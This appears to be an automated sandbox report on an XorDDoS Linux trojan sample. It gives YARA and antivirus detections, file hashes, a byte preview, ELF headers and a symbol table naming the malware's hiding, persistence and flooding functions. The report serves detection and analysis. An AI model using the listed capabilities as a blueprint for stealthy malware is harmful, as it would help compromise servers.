                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/lib/libudev.so, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/lib/libudev.so, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Entropy (8bit):6.244348963770229
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                                                                                                                    • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                                                                                                                    File name:1.elf
                                                                                                                                                                                    File size:625'867 bytes
                                                                                                                                                                                    MD5:ff1a3683a5ad87f88858e92fbcf1ae57
                                                                                                                                                                                    SHA1:ce220486f7d4723406582f8496e8483bcc546beb
                                                                                                                                                                                    SHA256:d2d0a9fc3491d0689529b251d666f36b739acfbf4f7fe8190b6ebabb887b7154
                                                                                                                                                                                    SHA512:9039533b03c9cbd3a31d1f232080a7c6296a74e36cad46f31678478451b521d0c19cc5cc25cf88bccc7c4ed006c2f99470595cdd34cf3814ee4509bb80d5eebd
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91h
                                                                                                                                                                                    TLSH:42D47D06F243EAF7C4970570124BF7BF4230E6318412DF8AB6889D5AB9379F52A4E356
                                                                                                                                                                                    File Content Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r.......................... ... ................a..............@...........Q.td........................................GNU.................U......5...

                                                                                                                                                                                    ELF header

                                                                                                                                                                                    Class:ELF32
                                                                                                                                                                                    Data:2's complement, little endian
                                                                                                                                                                                    Version:1 (current)
                                                                                                                                                                                    Machine:Intel 80386
                                                                                                                                                                                    Version Number:0x1
                                                                                                                                                                                    Type:EXEC (Executable file)
                                                                                                                                                                                    OS/ABI:UNIX - System V
                                                                                                                                                                                    ABI Version:0
                                                                                                                                                                                    Entry Point Address:0x8048110
                                                                                                                                                                                    Flags:0x0
                                                                                                                                                                                    ELF Header Size:52
                                                                                                                                                                                    Program Header Offset:52
                                                                                                                                                                                    Program Header Size:32
                                                                                                                                                                                    Number of Program Headers:5
                                                                                                                                                                                    Section Header Offset:553480
                                                                                                                                                                                    Section Header Size:40
                                                                                                                                                                                    Number of Section Headers:28
                                                                                                                                                                                    Header String Table Index:25
                                                                                                                                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                                                                                    NULL0x00x00x00x00x0000
                                                                                                                                                                                    .note.ABI-tagNOTE0x80480d40xd40x200x00x2A004
                                                                                                                                                                                    .initPROGBITS0x80480f40xf40x170x00x6AX004
                                                                                                                                                                                    .textPROGBITS0x80481100x1100x697d80x00x6AX0016
                                                                                                                                                                                    __libc_freeres_fnPROGBITS0x80b18f00x698f00x100f0x00x6AX0016
                                                                                                                                                                                    __libc_thread_freeres_fnPROGBITS0x80b29000x6a9000x1db0x00x6AX0016
                                                                                                                                                                                    .finiPROGBITS0x80b2adc0x6aadc0x1c0x00x6AX004
                                                                                                                                                                                    .rodataPROGBITS0x80b2b000x6ab000x153c00x00x2A0032
                                                                                                                                                                                    __libc_subfreeresPROGBITS0x80c7ec00x7fec00x300x00x2A004
                                                                                                                                                                                    __libc_atexitPROGBITS0x80c7ef00x7fef00x40x00x2A004
                                                                                                                                                                                    __libc_thread_subfreeresPROGBITS0x80c7ef40x7fef40x80x00x2A004
                                                                                                                                                                                    .eh_framePROGBITS0x80c7efc0x7fefc0x60f40x00x2A004
                                                                                                                                                                                    .gcc_except_tablePROGBITS0x80cdff00x85ff00x11b0x00x2A001
                                                                                                                                                                                    .tdataPROGBITS0x80cf10c0x8610c0x140x00x403WAT004
                                                                                                                                                                                    .tbssNOBITS0x80cf1200x861200x2c0x00x403WAT004
                                                                                                                                                                                    .ctorsPROGBITS0x80cf1200x861200x80x00x3WA004
                                                                                                                                                                                    .dtorsPROGBITS0x80cf1280x861280xc0x00x3WA004
                                                                                                                                                                                    .jcrPROGBITS0x80cf1340x861340x40x00x3WA004
                                                                                                                                                                                    .data.rel.roPROGBITS0x80cf1380x861380x2c0x00x3WA004
                                                                                                                                                                                    .gotPROGBITS0x80cf1640x861640x80x40x3WA004
                                                                                                                                                                                    .got.pltPROGBITS0x80cf16c0x8616c0xc0x40x3WA004
                                                                                                                                                                                    .dataPROGBITS0x80cf1800x861800xb400x00x3WA0032
                                                                                                                                                                                    .bssNOBITS0x80cfcc00x86cc00x67180x00x3WA0032
                                                                                                                                                                                    __libc_freeres_ptrsNOBITS0x80d63d80x86cc00x140x00x3WA004
                                                                                                                                                                                    .commentPROGBITS0x00x86cc00x4220x00x0001
                                                                                                                                                                                    .shstrtabSTRTAB0x00x870e20x1260x00x0001
                                                                                                                                                                                    .symtabSYMTAB0x00x876680x93c00x100x0279144
                                                                                                                                                                                    .strtabSTRTAB0x00x90a280x82a30x00x0001
                                                                                                                                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                                                                                    LOAD0x00x80480000x80480000x8610b0x8610b6.19650x5R E0x1000.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
                                                                                                                                                                                    LOAD0x8610c0x80cf10c0x80cf10c0xbb40x72e03.65720x6RW 0x1000.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
                                                                                                                                                                                    NOTE0xd40x80480d40x80480d40x200x201.74870x4R 0x4.note.ABI-tag
                                                                                                                                                                                    TLS0x8610c0x80cf10c0x80cf10c0x140x402.84140x4R 0x4.tdata .tbss
                                                                                                                                                                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                                                                                                                                    NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                                                                                                                                    .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                                                                                    .symtab0x80480d40SECTION<unknown>DEFAULT1
                                                                                                                                                                                    .symtab0x80480f40SECTION<unknown>DEFAULT2
                                                                                                                                                                                    .symtab0x80481100SECTION<unknown>DEFAULT3
                                                                                                                                                                                    .symtab0x80b18f00SECTION<unknown>DEFAULT4
                                                                                                                                                                                    .symtab0x80b29000SECTION<unknown>DEFAULT5
                                                                                                                                                                                    .symtab0x80b2adc0SECTION<unknown>DEFAULT6
                                                                                                                                                                                    .symtab0x80b2b000SECTION<unknown>DEFAULT7
                                                                                                                                                                                    .symtab0x80c7ec00SECTION<unknown>DEFAULT8
                                                                                                                                                                                    .symtab0x80c7ef00SECTION<unknown>DEFAULT9
                                                                                                                                                                                    .symtab0x80c7ef40SECTION<unknown>DEFAULT10
                                                                                                                                                                                    .symtab0x80c7efc0SECTION<unknown>DEFAULT11
                                                                                                                                                                                    .symtab0x80cdff00SECTION<unknown>DEFAULT12
                                                                                                                                                                                    .symtab0x80cf10c0SECTION<unknown>DEFAULT13
                                                                                                                                                                                    .symtab0x80cf1200SECTION<unknown>DEFAULT14
                                                                                                                                                                                    .symtab0x80cf1200SECTION<unknown>DEFAULT15
                                                                                                                                                                                    .symtab0x80cf1280SECTION<unknown>DEFAULT16
                                                                                                                                                                                    .symtab0x80cf1340SECTION<unknown>DEFAULT17
                                                                                                                                                                                    .symtab0x80cf1380SECTION<unknown>DEFAULT18
                                                                                                                                                                                    .symtab0x80cf1640SECTION<unknown>DEFAULT19
                                                                                                                                                                                    .symtab0x80cf16c0SECTION<unknown>DEFAULT20
                                                                                                                                                                                    .symtab0x80cf1800SECTION<unknown>DEFAULT21
                                                                                                                                                                                    .symtab0x80cfcc00SECTION<unknown>DEFAULT22
                                                                                                                                                                                    .symtab0x80d63d80SECTION<unknown>DEFAULT23
                                                                                                                                                                                    .symtab0x00SECTION<unknown>DEFAULT24
                                                                                                                                                                                    .L108.symtab0x80ad9500NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L113.symtab0x80ad9900NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L114.symtab0x80ad9f80NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L115.symtab0x80ada300NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L116.symtab0x80ada4e0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L117.symtab0x80ada6c0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L118.symtab0x80ada890NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L119.symtab0x80adabd0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L12.symtab0x80b130b0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L120.symtab0x80adadc0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L121.symtab0x80adafb0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L122.symtab0x80ad8e30NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L123.symtab0x80adb2b0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L124.symtab0x80add7f0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L125.symtab0x80addb40NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L126.symtab0x80add020NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L127.symtab0x80add1f0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L128.symtab0x80add460NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L129.symtab0x80add630NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L130.symtab0x80adb8c0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L131.symtab0x80adbd30NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L132.symtab0x80adc000NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L133.symtab0x80adc370NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L134.symtab0x80adc500NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L135.symtab0x80adc7d0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L136.symtab0x80adcb50NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L137.symtab0x80adcc90NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L14.symtab0x80b14190NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L15.symtab0x80b14080NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L16.symtab0x80b13f80NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L17.symtab0x80b13e80NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L18.symtab0x80b138c0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L19.symtab0x80b137e0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L20.symtab0x80b13450NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L21.symtab0x80b13710NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L258.symtab0x80ae76c0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L259.symtab0x80ae4a00NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L260.symtab0x80ae5f70NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L261.symtab0x80ae7c00NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L262.symtab0x80ae5e90NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L264.symtab0x80ae43d0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L266.symtab0x80ae4960NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L267.symtab0x80ae68f0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L268.symtab0x80ae6a00NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L269.symtab0x80ae6050NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L270.symtab0x80ae6280NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L271.symtab0x80ae6420NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L272.symtab0x80ae6640NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L273.symtab0x80ae4ab0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L274.symtab0x80ae4e40NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L275.symtab0x80ae5990NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L276.symtab0x80ae55f0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L277.symtab0x80ae5da0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L278.symtab0x80ae8350NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L279.symtab0x80ae7ce0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L280.symtab0x80ae7e00NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L281.symtab0x80ae6b70NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L282.symtab0x80ae70c0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L283.symtab0x80ae4670NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L350.symtab0x80ae8400NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L351.symtab0x80ae84a0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L352.symtab0x80ae8590NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L353.symtab0x80ae8630NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L354.symtab0x80ae8720NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L355.symtab0x80ae87d0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L356.symtab0x80ae8870NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L357.symtab0x80ae8920NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L358.symtab0x80ae89e0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L359.symtab0x80ae8aa0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L360.symtab0x80ae8b30NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L361.symtab0x80ae8bd0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L362.symtab0x80ae8cc0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L363.symtab0x80ae8db0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L364.symtab0x80ae8ea0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L365.symtab0x80ae8f90NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L366.symtab0x80ae9080NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L380.symtab0x80ae4380NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L411.symtab0x80aeb100NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L412.symtab0x80aeae60NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L413.symtab0x80aeb540NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L414.symtab0x80aebc00NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L415.symtab0x80aec200NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L416.symtab0x80aec600NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L61.symtab0x80ad6730NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L63.symtab0x80ad6ef0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L64.symtab0x80ad6ce0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L67.symtab0x80ad6de0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L68.symtab0x80ad6d60NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L69.symtab0x80ad6a20NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L70.symtab0x80ad6c20NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L74.symtab0x80afb630NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L76.symtab0x80afbdf0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L77.symtab0x80afbbe0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L80.symtab0x80afbce0NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L81.symtab0x80afbc60NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L82.symtab0x80afb920NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    .L83.symtab0x80afbb20NOTYPE<unknown>DEFAULT3
                                                                                                                                                                                    AddService.symtab0x8048865807FUNC<unknown>DEFAULT3
                                                                                                                                                                                    CalcCrc32.symtab0x80492b470FUNC<unknown>DEFAULT3
                                                                                                                                                                                    CalcFileCrc.symtab0x8049346172FUNC<unknown>DEFAULT3
                                                                                                                                                                                    CalcFindIpCrc.symtab0x804932038FUNC<unknown>DEFAULT3
                                                                                                                                                                                    CalcHeaderCrc.symtab0x80492fa38FUNC<unknown>DEFAULT3
                                                                                                                                                                                    CheckLKM.symtab0x804a670107FUNC<unknown>DEFAULT3
                                                                                                                                                                                    CreateDir.symtab0x80483de375FUNC<unknown>DEFAULT3
                                                                                                                                                                                    DNS_ADDR.symtab0x80cf4cc16OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    DNS_ADDR2.symtab0x80cf4dc16OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    DNS_PORT.symtab0x80cf4ec4OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    DelService.symtab0x8048cdc275FUNC<unknown>DEFAULT3
                                                                                                                                                                                    DelService_form_pid.symtab0x8048def113FUNC<unknown>DEFAULT3
                                                                                                                                                                                    GetCpuInfo.symtab0x804e2ce539FUNC<unknown>DEFAULT3
                                                                                                                                                                                    GetIndex.symtab0x804b418189FUNC<unknown>DEFAULT3
                                                                                                                                                                                    GetLanSpeed.symtab0x804e5e1243FUNC<unknown>DEFAULT3
                                                                                                                                                                                    GetMemStat.symtab0x804e1d9245FUNC<unknown>DEFAULT3
                                                                                                                                                                                    Get_AllIP.symtab0x804ef5d375FUNC<unknown>DEFAULT3
                                                                                                                                                                                    HideFile.symtab0x804a74d151FUNC<unknown>DEFAULT3
                                                                                                                                                                                    HidePidPort.symtab0x804a6db114FUNC<unknown>DEFAULT3
                                                                                                                                                                                    InstallSYS.symtab0x8048b8c336FUNC<unknown>DEFAULT3
                                                                                                                                                                                    LinuxExec.symtab0x8048eed122FUNC<unknown>DEFAULT3
                                                                                                                                                                                    LinuxExec_Argv.symtab0x8048f67135FUNC<unknown>DEFAULT3
                                                                                                                                                                                    LinuxExec_Argv2.symtab0x8048fee148FUNC<unknown>DEFAULT3
                                                                                                                                                                                    LogFacility.symtab0x80cfa0c4OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    LogFile.symtab0x80cfa084OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    LogMask.symtab0x80cfa004OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    LogStat.symtab0x80d50444OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    LogTag.symtab0x80d50484OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    LogType.symtab0x80cfa044OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    MAGIC_STR.symtab0x80d1f6033OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    MainList.symtab0x80d1fa0264OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    ReadWord.symtab0x804e150137FUNC<unknown>DEFAULT3
                                                                                                                                                                                    SIZE_DNS_H.symtab0x80cf4a44OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    SIZE_DNS_T.symtab0x80cf4a84OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    SIZE_IP_H.symtab0x80cf4984OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    SIZE_PSEUDO_HDR.symtab0x80cf4ac4OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    SIZE_TCP_H.symtab0x80cf4a04OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    SIZE_UDP_H.symtab0x80cf49c4OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    SYS_BUF.symtab0x80cfce01OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    SyslogAddr.symtab0x80d5060110OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    THREAD_NUM.symtab0x80d61704OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    _Exit.symtab0x8067a2819FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _GLOBAL_OFFSET_TABLE_.symtab0x80cf16c0OBJECT<unknown>HIDDEN20
                                                                                                                                                                                    _IO_2_1_stderr_.symtab0x80cf700152OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    _IO_2_1_stdin_.symtab0x80cf5c0152OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    _IO_2_1_stdout_.symtab0x80cf660152OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    _IO_adjust_column.symtab0x805c9b060FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_adjust_wcolumn.symtab0x808477063FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_cleanup.symtab0x805d310409FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_doallocate.symtab0x805de10143FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_finish.symtab0x805e310525FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_imbue.symtab0x805cac05FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_pbackfail.symtab0x805d900310FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_read.symtab0x805ca9010FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_seek.symtab0x805ca7015FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_seekoff.symtab0x805c90015FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_seekpos.symtab0x805c81059FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_setbuf.symtab0x805dd10244FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_showmanyc.symtab0x805cab010FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_stat.symtab0x805ca8010FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_sync.symtab0x805c8f07FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_uflow.symtab0x805c7b052FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_underflow.symtab0x805c7a010FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_write.symtab0x805caa07FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_xsgetn.symtab0x805e250185FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_default_xsputn.symtab0x805cc80225FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_do_write.symtab0x805bd80271FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_doallocbuf.symtab0x805dc80133FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_fclose.symtab0x8057df0439FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_feof.symtab0x80596d0154FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_fgets.symtab0x8057ff0360FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_attach.symtab0x8059dc0133FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_close.symtab0x805a94018FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_close_it.symtab0x805b2f0581FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_close_mmap.symtab0x805a96060FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_doallocate.symtab0x80839b0275FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_finish.symtab0x805c4a0327FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_fopen.symtab0x805b5401388FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_init.symtab0x805b04051FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_jumps.symtab0x80b3e0084OBJECT<unknown>DEFAULT7
                                                                                                                                                                                    _IO_file_jumps_maybe_mmap.symtab0x80b3ec084OBJECT<unknown>DEFAULT7
                                                                                                                                                                                    _IO_file_jumps_mmap.symtab0x80b3e6084OBJECT<unknown>DEFAULT7
                                                                                                                                                                                    _IO_file_open.symtab0x805af30263FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_overflow.symtab0x805c0301131FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_read.symtab0x805a9d048FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_seek.symtab0x8059fd018FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_seekoff.symtab0x805aa001245FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_seekoff_maybe_mmap.symtab0x8059f8080FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_seekoff_mmap.symtab0x8059e50297FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_setbuf.symtab0x805aee075FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_setbuf_mmap.symtab0x805b270115FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_stat.symtab0x805a9a037FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_sync.symtab0x805be90406FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_sync_mmap.symtab0x8059ff0165FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_underflow.symtab0x805b080495FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_underflow_maybe_mmap.symtab0x805a2e030FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_underflow_mmap.symtab0x805a6b066FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_write.symtab0x805a890166FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_xsgetn.symtab0x805a700394FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_xsgetn_maybe_mmap.symtab0x805a29067FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_xsgetn_mmap.symtab0x805a5b0242FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_file_xsputn.symtab0x805bab0705FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_flush_all.symtab0x805d4b020FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_flush_all_linebuffered.symtab0x805cf30448FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_flush_all_lockp.symtab0x805d0f0533FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_fopen.symtab0x80582a034FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_fprintf.symtab0x808333036FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_free_backup_area.symtab0x805cc2093FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_free_wbackup_area.symtab0x80847f0104FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_ftell.symtab0x8083ad0436FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_funlockfile.symtab0x80833c047FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_fwide.symtab0x8085950323FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_fwrite.symtab0x8083d60297FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_getc.symtab0x8059880207FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_getdelim.symtab0x8083eb0624FUNC<unknown>DEFAULT3
                                                                                                                                                                                    _IO_getline.symtab0x805844055FUNC<unknown>DEFAULT3
